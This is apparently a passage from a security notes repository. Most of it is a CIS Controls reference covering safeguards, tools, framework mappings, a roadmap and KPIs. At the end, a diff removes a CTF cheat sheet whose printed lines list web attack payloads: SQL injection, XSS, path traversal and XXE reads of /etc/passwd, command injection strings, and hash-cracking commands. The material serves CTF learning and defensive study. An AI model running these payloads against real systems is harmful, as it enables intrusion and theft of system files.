 - NIST CSF: PR.DS-1, PR.DS-2, PR.DS-5, PR.PT-2
 - ISO 27001: A.8.2.1, A.8.2.2, A.8.2.3, A.10.1.1
 - NIST 800-53: SC-8, SC-28, MP-2, MP-3, MP-4
 - GDPR: Articles 5, 6, 25, 32
 - PCI DSS: 3.1, 3.2, 3.4, 3.5, 3.6
 ### CIS Control 4: Secure Configuration of Enterprise Assets and Software
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 4.1 | Establish Secure Configuration Process | Document hardening standards |
 | 4.2 | Establish Secure Configuration Management | Use secure baselines |
 | 4.3 | Configure Automatic Session Locking | Set screen timeout policies |
 | 4.4 | Implement Strong Authentication | Use MFA where possible |
 | 4.5 | Implement Secure Boot | Enable secure boot on systems |
 | 4.6 | Securely Manage Enterprise Assets | Use trusted software/images |
 | 4.7 | Manage Default Accounts | Change defaults, disable when possible |
 | 4.8 | Uninstall or Disable Unnecessary Services | Remove unneeded services |
 | 4.9 | Configure Trusted DNS Servers | Use secure DNS providers |
 | 4.10 | Enforce Secure Configuration | Monitor and enforce compliance |
 | 4.11 | Apply Host-Based Firewalls | Deploy on all endpoints |
 | 4.12 | Separate Management Network | Isolate management traffic |
 **Key Tools:**
 - Configuration management (Chef, Puppet, Ansible)
 - Secure configuration scanners (CIS-CAT, Nessus)
 - Group Policy/MDM solutions
 - Baseline management tools
 **Framework Mappings:**
 - NIST CSF: PR.IP-1, PR.PT-3
 - ISO 27001: A.12.1.2, A.14.2.2, A.14.2.3, A.14.2.4
 - NIST 800-53: CM-2, CM-6, CM-7, IA-5
 - PCI DSS: 2.2, 2.3, 2.6
 ### CIS Control 5: Account Management
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 5.1 | Establish Account Management Process | Document user lifecycle |
 | 5.2 | Use Unique Passwords | Implement password policies |
 | 5.3 | Disable Dormant Accounts | Auto-disable after inactivity |
 | 5.4 | Restrict Administrator Privileges | Limit admin accounts |
 | 5.5 | Establish Account Monitoring | Alert on suspicious activities |
 | 5.6 | Centralize Account Management | Use directory services |
 | 5.7 | Implement MFA for Privileged Users | Require strong auth for admins |
 | 5.8 | Implement MFA for Remote Network Access | Secure VPN/external connections |
 | 5.9 | Implement MFA for Internet-Accessible Services | Protect external services |
 **Key Tools:**
 - Identity Management (Active Directory, Okta)
 - Privileged Access Management (CyberArk, BeyondTrust)
 - MFA solutions (Duo, RSA)
 - Account monitoring tools
 **Framework Mappings:**
 - NIST CSF: PR.AC-1, PR.AC-4, PR.AC-7
 - ISO 27001: A.9.2.1, A.9.2.2, A.9.2.3, A.9.2.5, A.9.2.6
 - NIST 800-53: AC-2, AC-3, AC-6, IA-2, IA-5
 - PCI DSS: 7.1, 7.2, 8.1, 8.2, 8.3
 ### CIS Control 6: Access Control Management
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 6.1 | Establish Access Control Management Process | Define access request/approval process |
 | 6.2 | Establish Access Revoking Process | Document termination procedures |
 | 6.3 | Require MFA for Externally-Exposed Applications | Protect public-facing services |
 | 6.4 | Require MFA for Remote Network Access | Secure remote connections |
 | 6.5 | Require MFA for Administrative Access | Use strong auth for all privileged actions |
 | 6.6 | Establish An Access Governance Process | Implement periodic reviews |
 | 6.7 | Centralize Access Control | Use single access platform |
 | 6.8 | Define Acceptable Use | Create policy for proper system use |
 | 6.9 | Control Credential Disclosure | Protect secrets |
 **Key Tools:**
 - Role-based access control systems
 - Identity Governance solutions (SailPoint, Saviynt)
 - Access certification tools
 - PAM solutions
 **Framework Mappings:**
 - NIST CSF: PR.AC-1, PR.AC-3, PR.AC-4
 - ISO 27001: A.9.1.1, A.9.1.2, A.9.2.3, A.9.4.1
 - NIST 800-53: AC-1, AC-2, AC-3, AC-5, AC-6, AC-17
 - PCI DSS: 7.1, 7.2, 8.3
 ### CIS Control 7: Continuous Vulnerability Management
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 7.1 | Establish Vulnerability Management Process | Define scanning schedule |
 | 7.2 | Establish a Remediation Process | Document patching procedures |
 | 7.3 | Perform Automated Operating System Patch Management | Use patch management tools |
 | 7.4 | Perform Automated Application Patch Management | Automate app updates |
 | 7.5 | Perform Automated Vulnerability Scans | Schedule regular scans |
 | 7.6 | Remediate Detected Vulnerabilities | Track and manage fixes |
 | 7.7 | Utilize Industry-Recommended Vulnerability Sources | Subscribe to advisory feeds |
 **Key Tools:**
 - Vulnerability scanners (Nessus, Qualys, OpenVAS)
 - Patch management (WSUS, SCCM, Ivanti)
 - Vulnerability management platforms
 - Threat intelligence feeds
 **Framework Mappings:**
 - NIST CSF: ID.RA-1, ID.RA-2, PR.IP-12
 - ISO 27001: A.12.6.1, A.12.6.2, A.14.2.3
 - NIST 800-53: RA-3, RA-5, SI-2
 - PCI DSS: 6.1, 6.2, 11.2
 ### CIS Control 8: Audit Log Management
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 8.1 | Establish Audit Log Management | Define logging strategy |
 | 8.2 | Collect Audit Logs | Configure logging for all assets |
 | 8.3 | Ensure Adequate Audit Log Storage | Size storage appropriately |
 | 8.4 | Standardize Time Synchronization | Implement NTP |
 | 8.5 | Collect Detailed Audit Logs | Capture comprehensive events |
 | 8.6 | Collect DNS Query Logs | Monitor DNS activity |
 | 8.7 | Collect URL Request Logs | Track web browsing |
 | 8.8 | Collect Command-Line Audit Logs | Monitor command execution |
 | 8.9 | Centralize Audit Logs | Aggregate to SIEM |
 | 8.10 | Retain Audit Logs | Define retention period |
 | 8.11 | Conduct Audit Log Reviews | Regular log analysis |
 | 8.12 | Collect Service Provider Logs | Include cloud services |
 **Key Tools:**
 - SIEM solutions (Splunk, ELK Stack, QRadar)
 - Log aggregation tools (NXLog, Syslog-ng)
 - NTP servers
 - Log storage solutions
 **Framework Mappings:**
 - NIST CSF: PR.PT-1, DE.CM-1, DE.CM-3, DE.CM-7
 - ISO 27001: A.12.4.1, A.12.4.2, A.12.4.3, A.12.4.4
 - NIST 800-53: AU-2, AU-3, AU-6, AU-7, AU-8, AU-9, AU-11, AU-12
 - PCI DSS: 10.1, 10.2, 10.3, 10.4, 10.5, 10.6, 10.7
 ### CIS Control 9: Email and Web Browser Protections
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 9.1 | Ensure Use of Only Fully Supported Browsers and Email Clients | Keep updated |
 | 9.2 | Use DNS Filtering Services | Block malicious domains |
 | 9.3 | Maintain Network-Based URL Filters | Implement web filtering |
 | 9.4 | Restrict Unnecessary or Unauthorized Browser and Email Client Extensions | Control plugins |
 | 9.5 | Implement DMARC | Enable email authentication |
 | 9.6 | Block Unnecessary File Types | Filter risky attachments |
 | 9.7 | Deploy and Maintain Email Server Anti-Malware Protections | Scan emails for threats |
 **Key Tools:**
 - Secure email gateways (Proofpoint, Mimecast)
 - DNS filtering (Cisco Umbrella, Quad9)
 - Web proxies (Zscaler, Blue Coat)
 - Email authentication (DKIM, SPF, DMARC)
 **Framework Mappings:**
 - NIST CSF: PR.DS-6, PR.DS-7, DE.CM-5
 - ISO 27001: A.13.1.1, A.13.1.2
 - NIST 800-53: SC-7, SC-8
 - PCI DSS: 1.3, 4.1, 5.1, 5.3
 ### CIS Control 10: Malware Defenses
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 10.1 | Deploy and Maintain Anti-Malware Software | Install on all endpoints |
 | 10.2 | Configure Automatic Anti-Malware Signature Updates | Enable auto-updates |
 | 10.3 | Disable Autorun and Autoplay for Removable Media | Prevent auto-execution |
 | 10.4 | Configure Automatic Anti-Malware Scanning | Schedule regular scans |
 | 10.5 | Enable Anti-Exploitation Features | Use OS security features |
 | 10.6 | Centrally Manage Anti-Malware Software | Deploy management console |
 | 10.7 | Use Behavior-Based Anti-Malware Software | Implement advanced protection |
 **Key Tools:**
 - Endpoint protection platforms (CrowdStrike, Symantec, Microsoft Defender)
 - Application whitelisting
 - Behavioral analysis tools
 - Anti-exploitation (EMET, Windows Defender Exploit Guard)
 **Framework Mappings:**
 - NIST CSF: DE.CM-4, DE.CM-5, PR.DS-5
 - ISO 27001: A.12.2.1
 - NIST 800-53: SI-3, SI-4, SI-8
 - PCI DSS: 5.1, 5.2, 5.3
 ### CIS Control 11: Data Recovery
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 11.1 | Establish Data Recovery Process | Document backup procedures |
 | 11.2 | Perform Automated Backups | Schedule regular backups |
 | 11.3 | Protect Recovery Data | Secure backup infrastructure |
 | 11.4 | Establish Secure Recovery Process | Document restoration procedures |
 | 11.5 | Test Data Recovery | Regular restore testing |
 **Key Tools:**
 - Backup solutions (Veeam, Veritas, Commvault)
 - Cloud backup (AWS Backup, Azure Backup)
 - Immutable storage
 - Air-gapped backups
 **Framework Mappings:**
 - NIST CSF: PR.IP-4, RC.RP-1
 - ISO 27001: A.12.3.1, A.17.1.2, A.17.1.3
 - NIST 800-53: CP-9, CP-10
 - PCI DSS: 9.5, 9.6, 9.7, 12.10.1
 ### CIS Control 12: Network Infrastructure Management
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 12.1 | Ensure Network Infrastructure is Up-to-Date | Patch networking devices |
 | 12.2 | Establish Network Infrastructure Management Process | Document procedures |
 | 12.3 | Securely Manage Network Infrastructure | Use secure protocols |
 | 12.4 | Establish and Maintain Dedicated, Secure Management Network | Separate management plane |
 | 12.5 | Centralize Network Authentication, Authorization, and Auditing | Implement AAA |
 | 12.6 | Use Standard Secure Signaling and Transport Protocols | Secure communications |
 | 12.7 | Ensure Remote Devices Utilize a VPN | Secure remote connections |
 | 12.8 | Establish and Maintain Dedicated Computing Resources for Critical Networks | Segment sensitive functions |
 **Key Tools:**
 - Network management platforms (Cisco, Aruba, Juniper)
 - AAA servers (RADIUS, TACACS+)
 - Network configuration management
 - VPN solutions
 **Framework Mappings:**
 - NIST CSF: PR.AC-5, PR.PT-4
 - ISO 27001: A.13.1.1, A.13.1.3
 - NIST 800-53: AC-17, AC-18, IA-3, SC-7, SC-8
 - PCI DSS: 1.1, 1.2, 1.3, 2.2
 ### CIS Control 13: Network Monitoring and Defense
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 13.1 | Centralize Security Event Alerting | Implement SIEM |
 | 13.2 | Deploy a Host-Based IDS or IPS | Install endpoint detection |
 | 13.3 | Deploy a Network-Based IDS, IPS or NDR | Monitor network traffic |
 | 13.4 | Perform Traffic Filtering | Deploy firewalls |
 | 13.5 | Manage Access Control for Remote Assets | Control remote connections |
 | 13.6 | Collect Network Traffic Flow Logs | Capture NetFlow |
 | 13.7 | Deploy a Network-Based DLP | Monitor for data exfiltration |
 | 13.8 | Deploy a Network-Based Sandbox | Analyze suspicious files |
 | 13.9 | Deploy Port-Level Access Control | Implement 802.1X |
 | 13.10 | Perform Application Layer Filtering | Use web application firewalls |
 | 13.11 | Tune Security Event Alerting Thresholds | Reduce false positives |
 **Key Tools:**
 - Network IDS/IPS (Suricata, Snort, Cisco)
 - SIEM solutions (Splunk, QRadar)
 - NDR solutions (Darktrace, ExtraHop)
 - NetFlow analyzers
 - Next-gen firewalls
 **Framework Mappings:**
 - NIST CSF: DE.AE-1, DE.AE-2, DE.AE-3, DE.CM-1, DE.CM-7
 - ISO 27001: A.12.4.1, A.13.1.1, A.13.1.2
 - NIST 800-53: SI-4, AU-6
 - PCI DSS: 10.6, 11.4, 11.5
 ### CIS Control 14: Security Awareness and Skills Training
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 14.1 | Establish Security Awareness Program | Document training strategy |
 | 14.2 | Train Workforce Members | Implement regular training |
 | 14.3 | Train Workforce on Authentication Best Practices | Password/MFA education |
 | 14.4 | Train Workforce on Data Handling Best Practices | Sensitive data procedures |
 | 14.5 | Train Workforce on Causes of Unintentional Data Exposure | Prevent mistakes |
 | 14.6 | Train Workforce on Recognizing and Reporting Security Incidents | Incident reporting process |
 | 14.7 | Train Workforce on How to Identify and Report Phishing Attacks | Phishing recognition |
 | 14.8 | Train Workforce on Secure Use of Social Media | Social media risks |
 | 14.9 | Train Workforce on Secure Use of Mobile Devices | Mobile security |
 **Key Tools:**
 - Security awareness platforms (KnowBe4, Proofpoint)
 - Phishing simulation tools
 - Learning management systems
 - Training content providers
 **Framework Mappings:**
 - NIST CSF: PR.AT-1, PR.AT-2, PR.AT-5
 - ISO 27001: A.7.2.2, A.7.2.3
 - NIST 800-53: AT-1, AT-2, AT-3
 - PCI DSS: 12.6, 12.6.1, 12.6.2
 ### CIS Control 15: Service Provider Management
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 15.1 | Establish Service Provider Management Process | Document vendor management |
 | 15.2 | Establish Service Provider Requirements | Define security expectations |
 | 15.3 | Monitor Service Provider Compliance | Regular reviews |
 | 15.4 | Ensure Service Provider Contracts Include Security Requirements | Contract requirements |
 | 15.5 | Assess Service Providers | Due diligence process |
 | 15.6 | Monitor Service Provider Security | Ongoing validation |
 | 15.7 | Securely Decommission Service Providers | Offboarding process |
 **Key Tools:**
 - Vendor risk management platforms
 - Contract management systems
 - Security questionnaires
 - Continuous monitoring tools
 **Framework Mappings:**
 - NIST CSF: ID.SC-1, ID.SC-2, ID.SC-3, ID.SC-4, ID.SC-5
 - ISO 27001: A.15.1.1, A.15.1.2, A.15.1.3, A.15.2.1, A.15.2.2
 - NIST 800-53: SA-9, SA-12
 - PCI DSS: 12.8, 12.8.1-5, 12.9
 ### CIS Control 16: Application Software Security
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 16.1 | Establish Application Security Program | Document SDLC security |
 | 16.2 | Perform Application Classification | Assess application criticality |
 | 16.3 | Implement Secure Software Development Practices | Secure coding standards |
 | 16.4 | Establish a Secure Software Development Lifecycle | Include security in SDLC |
 | 16.5 | Use Up-to-Date and Trusted Third-Party Components | Manage dependencies |
 | 16.6 | Establish Secure Coding Practices | Developer guidelines |
 | 16.7 | Use Standard Hardening Configuration Templates | Application hardening |
 | 16.8 | Separate Production and Non-Production Systems | Environment segregation |
 | 16.9 | Train Developers in Application Security Concepts and Secure Coding | Developer education |
 | 16.10 | Apply Secure Design Principles in Application Architectures | Security architecture |
 | 16.11 | Leverage Vetted Modules or Services | Use proven components |
 | 16.12 | Implement Code-Level Security Checks | SAST/DAST |
 | 16.13 | Conduct Application Penetration Testing | Security testing |
 | 16.14 | Conduct Threat Modeling | Identify attack vectors |
 **Key Tools:**
 - SAST tools (SonarQube, Checkmarx)
 - DAST tools (OWASP ZAP, Burp Suite)
 - Dependency scanners (OWASP Dependency-Check)
 - SCA tools (Snyk, Black Duck)
 **Framework Mappings:**
 - NIST CSF: PR.DS-7, PR.IP-2
 - ISO 27001: A.14.1.1, A.14.2.1, A.14.2.2, A.14.2.5, A.14.2.6, A.14.2.8
 - NIST 800-53: SA-3, SA-4, SA-8, SA-11, SA-15, SA-16
 - PCI DSS: 6.3, 6.4, 6.5, 6.6
 ### CIS Control 17: Incident Response Management
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 17.1 | Establish Incident Response Process | Document IR plan |
 | 17.2 | Establish and Maintain Contact Information for Reporting Security Incidents | Define escalation paths |
 | 17.3 | Establish and Maintain an Enterprise Process for Reporting Incidents | Report procedures |
 | 17.4 | Establish and Maintain An Incident Response Process | IR workflows |
 | 17.5 | Assign Key Roles and Responsibilities | Define IR team |
 | 17.6 | Define Mechanisms for Communicating During Incident Response | Communication plans |
 | 17.7 | Conduct Routine Incident Response Exercises | Tabletop exercises |
 | 17.8 | Conduct Post-Incident Reviews | Lessons learned process |
 | 17.9 | Establish and Maintain Security Incident Thresholds | Event classification |
 **Key Tools:**
 - Incident response platforms (TheHive, RTIR)
 - Digital forensics tools
 - Threat intelligence platforms
 - Communication platforms
 **Framework Mappings:**
 - NIST CSF: RS.RP-1, RS.CO-1, RS.AN-1, RS.MI-1, RS.MI-2, RC.RP-1
 - ISO 27001: A.16.1.1, A.16.1.2, A.16.1.3, A.16.1.4, A.16.1.5, A.16.1.6, A.16.1.7
 - NIST 800-53: IR-1, IR-2, IR-3, IR-4, IR-5, IR-6, IR-7, IR-8
 - PCI DSS: 12.10, 12.10.1, 12.10.2, 12.10.3, 12.10.4, 12.10.5, 12.10.6
 ### CIS Control 18: Penetration Testing
 | Safeguard | Description | Implementation |
 |-----------|-------------|----------------|
 | 18.1 | Establish Penetration Testing Program | Document testing strategy |
 | 18.2 | Perform Regular External Penetration Tests | Test external perimeter |
 | 18.3 | Perform Regular Internal Penetration Tests | Test internal network |
 | 18.4 | Validate Security Measures | Verify control effectiveness |
 | 18.5 | Document Penetration Testing Results | Report all findings |
 | 18.6 | Test Critical Systems and Services | Focus on key assets |
 | 18.7 | Remediate Penetration Test Findings | Fix identified issues |
 | 18.8 | Use Qualified Penetration Testers | Engage skilled professionals |
 | 18.9 | Conduct Application Penetration Testing | Test web applications |
 | 18.10 | Conduct Physical Penetration Testing | Test physical security |
 **Key Tools:**
 - Penetration testing tools (Metasploit, Nmap, Burp Suite)
 - Vulnerability scanners (Nessus, OpenVAS)
 - Social engineering tools (SET, Gophish)
 - Physical penetration testing equipment
 **Framework Mappings:**
 - NIST CSF: ID.RA-1, DE.CM-8
 - ISO 27001: A.14.2.8, A.18.2.1, A.18.2.3
 - NIST 800-53: CA-8, RA-5, SA-11
 - PCI DSS: 11.3, 11.3.1, 11.3.2, 11.3.3, 11.3.4
 ## Framework Mapping Matrix
 | CIS Control | NIST CSF | ISO 27001 | NIST 800-53 | PCI DSS | HIPAA | GDPR |
 |-------------|----------|-----------|-------------|---------|-------|------|
 | 1. Inventory and Control of Enterprise Assets | ID.AM-1, ID.AM-2 | A.8.1.1, A.8.1.2 | CM-8, PM-5 | 2.4, 9.9, 11.1 | §164.310(d) | Art 30, 32 |
 | 2. Inventory and Control of Software Assets | ID.AM-2, PR.DS-6 | A.12.6.2, A.8.1.1 | CM-7, CM-8 | 2.4, 6.2 | §164.310(d) | Art 30 |
 | 3. Data Protection | PR.DS-1, PR.DS-2, PR.DS-5 | A.8.2.1-3, A.10.1.1 | SC-8, SC-28, MP-2-4 | 3.1-6, 4.1-2 | §164.312(a)(2)(iv) | Art 5, 6, 25, 32 |
 | 4. Secure Configuration of Enterprise Assets and Software | PR.IP-1, PR.PT-3 | A.12.1.2, A.14.2.2-4 | CM-2, CM-6, CM-7 | 2.2, 2.3, 2.6 | §164.310(c) | Art 25, 32 |
 | 5. Account Management | PR.AC-1, PR.AC-4, PR.AC-7 | A.9.2.1-6 | AC-2, AC-3, AC-6, IA-2, IA-5 | 7.1, 7.2, 8.1-3 | §164.308(a)(3), §164.308(a)(4) | Art 25, 32 |
 | 6. Access Control Management | PR.AC-1, PR.AC-3, PR.AC-4 | A.9.1.1-2, A.9.2.3, A.9.4.1 | AC-1-6, AC-17 | 7.1, 7.2, 8.3 | §164.308(a)(4) | Art 25, 32 |
 | 7. Continuous Vulnerability Management | ID.RA-1, ID.RA-2, PR.IP-12 | A.12.6.1-2, A.14.2.3 | RA-3, RA-5, SI-2 | 6.1, 6.2, 11.2 | §164.308(a)(1)(ii)(A) | Art 32 |
 | 8. Audit Log Management | PR.PT-1, DE.CM-1, DE.CM-3 | A.12.4.1-4 | AU-2-3, AU-6-12 | 10.1-7 | §164.308(a)(1)(ii)(D), §164.312(b) | Art 30, 32 |
 | 9. Email and Web Browser Protections | PR.DS-6, PR.DS-7, DE.CM-5 | A.13.1.1-2 | SC-7, SC-8 | 1.3, 4.1, 5.1, 5.3 | §164.308(a)(5)(ii)(B) | Art 32 |
 | 10. Malware Defenses | DE.CM-4, DE.CM-5, PR.DS-5 | A.12.2.1 | SI-3, SI-4, SI-8 | 5.1-3 | §164.308(a)(5)(ii)(B) | Art 32 |
 | 11. Data Recovery | PR.IP-4, RC.RP-1 | A.12.3.1, A.17.1.2-3 | CP-9, CP-10 | 9.5-7, 12.10.1 | §164.308(a)(7) | Art 32 |
 | 12. Network Infrastructure Management | PR.AC-5, PR.PT-4 | A.13.1.1, A.13.1.3 | AC-17-18, IA-3, SC-7-8 | 1.1-3, 2.2 | §164.312(a)(1) | Art 32 |
 | 13. Network Monitoring and Defense | DE.AE-1-3, DE.CM-1, DE.CM-7 | A.12.4.1, A.13.1.1-2 | SI-4, AU-6 | 10.6, 11.4, 11.5 | §164.308(a)(1)(ii)(D), §164.312(b) | Art 32 |
 | 14. Security Awareness and Skills Training | PR.AT-1, PR.AT-2, PR.AT-5 | A.7.2.2-3 | AT-1, AT-2, AT-3 | 12.6, 12.6.1-2 | §164.308(a)(5) | Art 32, 39 |
 | 15. Service Provider Management | ID.SC-1-5 | A.15.1.1-3, A.15.2.1-2 | SA-9, SA-12 | 12.8, 12.8.1-5, 12.9 | §164.308(b) | Art 28, 32 |
 | 16. Application Software Security | PR.DS-7, PR.IP-2 | A.14.1.1, A.14.2.1-2, A.14.2.5-6, A.14.2.8 | SA-3-4, SA-8, SA-11, SA-15-16 | 6.3-6 | §164.312(a)(1) | Art 25, 32 |
 | 17. Incident Response Management | RS.RP-1, RS.CO-1, RS.AN-1, RS.MI-1-2, RC.RP-1 | A.16.1.1-7 | IR-1-8 | 12.10, 12.10.1-6 | §164.308(a)(6) | Art 33, 34 |
 | 18. Penetration Testing | ID.RA-1, DE.CM-8 | A.14.2.8, A.18.2.1, A.18.2.3 | CA-8, RA-5, SA-11 | 11.3, 11.3.1-4 | §164.308(a)(8) | Art 32 |
 ## Implementation Priorities by Organization Size
 ### Small Organizations (Limited Resources)
 **Essential Controls to Implement First:**
 1. CIS Control 1: Inventory and Control of Enterprise Assets
 2. CIS Control 2: Inventory and Control of Software Assets
 3. CIS Control 3: Data Protection (focus on encryption)
 4. CIS Control 4: Secure Configuration (basic hardening)
 5. CIS Control 5: Account Management (focus on privileged accounts)
 6. CIS Control 7: Continuous Vulnerability Management (basic patching)
 7. CIS Control 10: Malware Defenses (endpoint protection)
 8. CIS Control 11: Data Recovery (basic backup strategy)
 9. CIS Control 14: Security Awareness Training (basic program)
 **Implementation Tips:**
 - Use free/open source tools where possible
 - Focus on cloud-based security solutions with minimal infrastructure
 - Implement managed security services for areas requiring expertise
 - Prioritize protecting the most critical systems and data
 - Consider outsourcing complex controls
 ### Medium Organizations (Moderate Resources)
 **Implementation Order:**
 1. Implement all Basic controls (1-6) thoroughly
 2. Implement Foundational controls (7-16) with focus on:
   - CIS Control 7: Continuous Vulnerability Management
   - CIS Control 8: Audit Log Management
   - CIS Control 10: Malware Defenses
   - CIS Control 11: Data Recovery
   - CIS Control 12: Network Infrastructure Management
   - CIS Control 13: Network Monitoring and Defense
 3. Begin implementing Organizational controls (17-18)
 **Implementation Tips:**
 - Establish formal security program with dedicated resources
 - Implement automation where possible
 - Consider hybrid of in-house and outsourced security services
 - Establish metrics to measure control effectiveness
 ### Large Organizations (Significant Resources)
 **Implementation Approach:**
 1. Implement all 18 CIS Controls comprehensively
 2. Focus on automation and integration
 3. Establish continuous monitoring and improvement
 4. Customize controls for industry-specific requirements
 5. Implement advanced capabilities within each control
 **Implementation Tips:**
 - Develop custom security architecture aligned with controls
 - Implement defense-in-depth strategy
 - Establish centralized security operations capability
 - Integrate controls with risk management program
 - Establish control validation and testing program
 ## Implementation Challenges and Solutions
 | Challenge | Description | Potential Solutions |
 |-----------|-------------|---------------------|
 | **Resource Constraints** | Limited budget, staff, or time | Start with critical controls, use free tools, consider managed services |
 | **Technical Complexity** | Some controls require specialized expertise | Outsource complex controls, invest in training, use simplified solutions |
 | **Legacy Systems** | Older systems may not support modern security | Implement compensating controls, isolate legacy systems, prioritize replacement |
 | **Organizational Resistance** | User pushback to security measures | Focus on user experience, demonstrate business value, executive sponsorship |
 | **Lack of Visibility** | Incomplete view of environment | Implement asset discovery tools, start with known assets, incremental improvement |
 | **Monitoring Fatigue** | Too many alerts, not enough analysts | Tune detections, prioritize alerts, automate responses where possible |
 | **Integration Challenges** | Making tools work together | Select integration-friendly solutions, use APIs, standardize data formats |
 | **Measuring Effectiveness** | Difficulty proving control value | Establish baseline metrics, track improvements, use maturity models |
 ## CIS Controls Implementation Roadmap
 ### Phase 1: Foundation (Months 1-3)
 - Complete initial asset inventory (CIS 1, 2)
 - Implement basic account controls (CIS 5)
 - Deploy endpoint protection (CIS 10)
 - Establish backup solution (CIS 11)
 - Begin security awareness program (CIS 14)
 ### Phase 2: Basic Security Posture (Months 4-6)
 - Implement secure configurations (CIS 4)
 - Establish vulnerability management (CIS 7)
 - Deploy basic log management (CIS 8)
 - Secure email and web browsing (CIS 9)
 - Document incident response procedures (CIS 17)
 ### Phase 3: Enhanced Protection (Months 7-12)
 - Implement data protection controls (CIS 3)
 - Enhance access control (CIS 6)
 - Secure network infrastructure (CIS 12)
 - Deploy network monitoring (CIS 13)
 - Review vendor security (CIS 15)
 ### Phase 4: Advanced Capabilities (Months 13-18)
 - Implement application security (CIS 16)
 - Conduct penetration testing (CIS 18)
 - Enhance and refine all controls
 - Establish metrics and reporting
 - Integrate with risk management
 ## Key Performance Indicators by Control
 | Control | Key Metrics | Target Values |
 |---------|-------------|---------------|
 | **1. Inventory** | % of assets inventoried, Unauthorized device detection time | >95% inventoried, <24h detection |
 | **2. Software Inventory** | % of software inventoried, % of unauthorized software | >95% inventoried, <2% unauthorized |
 | **3. Data Protection** | % of sensitive data encrypted, data loss incidents | >99% encrypted, 0 incidents |
 | **4. Secure Configuration** | % of systems with secure baseline, configuration drift rate | >95% compliant, <5% drift |
 | **5. Account Management** | % of accounts reviewed, dormant account count | 100% reviewed annually, <5% dormant |
 | **6. Access Control** | Excessive privilege rate, access review completion | <5% with excessive rights, 100% reviewed |
 | **7. Vulnerability Management** | Mean time to patch critical vulnerabilities, scan coverage | <7 days MTTR, >98% coverage |
 | **8. Audit Logging** | Logging coverage, log retention compliance | >98% coverage, 100% retention compliance |
 | **9. Email/Web Protection** | Phishing simulation success rate, malware blocked | <5% click rate, >99% block rate |
 | **10. Malware Defense** | Endpoint protection coverage, detection time | >99% coverage, <1 hour detection |
 | **11. Data Recovery** | Backup success rate, recovery time objective achievement | >99% success, 100% RTO met |
 | **12. Network Management** | Network device compliance, unauthorized change rate | >98% compliance, <1% unauthorized |
 | **13. Network Monitoring** | Alert triage time, true positive rate | <30 min triage, >80% true positive |
 | **14. Security Training** | Training completion rate, knowledge assessment scores | >95% completion, >85% score |
 | **15. Service Providers** | % of providers assessed, contract compliance | 100% assessed, 100% compliant |
 | **16. Application Security** | % of apps security tested, critical vulnerability remediation | 100% critical apps tested, <7 days remediation |
 | **17. Incident Response** | Mean time to respond, exercise completion | <4 hours MTTR, ≥2 exercises annually |
 | **18. Penetration Testing** | Test coverage, findings remediation rate | 100% critical systems, >95% remediation |
--- a/infosec/ctf-jeopardy.md
+++ b/infosec/ctf-jeopardy.md
@ -1,156 +0,0 @@
 # Jeopardy-Style CTF Cheatsheet
 ## Web Application Security
 | Challenge Type | Tools | Commands/Techniques | Common Approaches |
 |----------------|-------|---------------------|-------------------|
 | **Hidden Content** | Browser Dev Tools, Burp Suite | `CTRL+SHIFT+I` (Browser), `Ctrl+U` (View Source) | Check HTML comments, JavaScript files, robots.txt, .git folders |
 | **Cookie Manipulation** | Cookie Editor extension, Burp | Edit cookies directly in browser | Modify, decode (base64), check JWT tokens (jwt.io) |
 | **SQL Injection** | sqlmap, Burp Suite | `sqlmap -u "http://target.com/page?id=1" --dbs` | Try `' OR 1=1--`, `' UNION SELECT 1,2,3--` |
 | **XSS** | Browser, custom scripts | `<script>alert(1)</script>`, `<img src=x onerror=alert(1)>` | Test input fields, URL parameters, try bypass filters |
 | **CSRF** | Burp Suite, custom HTML | Create forms that auto-submit | Check missing CSRF tokens, test with custom forms |
 | **File Upload** | BurpSuite, custom files | Prepare malicious files, manipulate Content-Type | Try alternate extensions (.php.jpg), bypass client-side validation |
 | **Directory Traversal** | Browser, curl | `../../../etc/passwd`, `..%2f..%2f..%2fetc%2fpasswd` | Try to access files outside web root |
 | **Command Injection** | Browser, curl | `; ls`, `\| cat /etc/passwd`, `$(cat /flag.txt)` | Test input fields that might execute commands |
 | **Server-Side Template Injection** | Custom payloads | `{{7*7}}`, `${7*7}`, `<%= 7*7 %>` | Test different template engine syntaxes |
 | **Local File Inclusion** | Browser, curl | `?page=../../../etc/passwd` | Try path traversal to access local files |
 | **XML External Entity (XXE)** | Custom XML payloads | `<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>` | Test XML inputs for entity processing |
 ## Cryptography Challenges
 | Challenge Type | Tools | Commands/Techniques | Common Approaches |
 |----------------|-------|---------------------|-------------------|
 | **Caesar Cipher** | CyberChef, dcode.fr, Python | `for i in range(26): print(shift(ciphertext, i))` | Try all 26 shifts (brute force) |
 | **Substitution Cipher** | quipqiup.com, dcode.fr | Frequency analysis | Look for common patterns (THE, AND) |
 | **Vigenère Cipher** | CyberChef, dcode.fr | Determine key length, then solve | Find repeating patterns, use kasiski examination |
 | **XOR Encryption** | CyberChef, Python | `bytes_a ^ bytes_b` (Python) | Try single-byte XOR, try known plaintext |
 | **Base64** | CyberChef, terminal | `base64 -d file.txt` | Recognize by = padding at end, A-Za-z0-9+/ charset |
 | **Hex Encoding** | CyberChef, Python, xxd | `xxd -r -p hex.txt` | Look for 0-9, a-f characters |
 | **RSA** | RsaCtfTool, Python | `python RsaCtfTool.py --publickey key.pub --private` | Check small primes, common modulus, Fermat factorization |
 | **Hash Cracking** | Hashcat, john, CrackStation | `hashcat -m 0 hash.txt wordlist.txt` | Identify hash type, use rainbow tables or brute force |
 | **OpenSSL** | OpenSSL | `openssl enc -d -aes-256-cbc -in file.enc -out file.dec` | Try common passwords, check challenge hints |
